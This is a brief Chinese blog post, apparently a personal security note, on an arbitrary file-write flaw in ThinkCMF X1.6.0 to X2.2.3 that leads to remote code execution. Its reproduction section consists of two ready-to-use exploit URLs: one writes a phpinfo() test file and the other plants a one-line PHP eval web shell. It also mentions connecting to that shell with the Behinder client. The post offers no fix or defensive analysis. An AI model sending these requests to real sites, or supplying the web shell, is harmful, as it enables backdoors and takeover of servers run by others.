应用安全 - CMS - ThinkCMF - 漏洞汇总

ThinkCMF X1.6.0-X2.2.3任意内容包含漏洞

Date：
2019.10

类型：
任意文件写入导致远程代码执行

影响范围：
ThinkCMF X1.6.0
ThinkCMF X2.1.0
ThinkCMF X2.2.0
ThinkCMF X2.2.1
ThinkCMF X2.2.2
ThinkCMF X2.2.3

复现：
写入phpinfo()
http://127.0.0.1/cmfx-master/?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php>
写入PHP后门
http://127.0.0.1/cmfx-master/?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('shell.php','<?php @eval($_POST[1]); ?>')</php>
冰蝎成功截图：

posted @ 2019-11-22 15:15 7hang 阅读(516) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

7hang.

网络安全爱好者，blog is just for notes.

应用安全 - CMS - ThinkCMF - 漏洞汇总

公告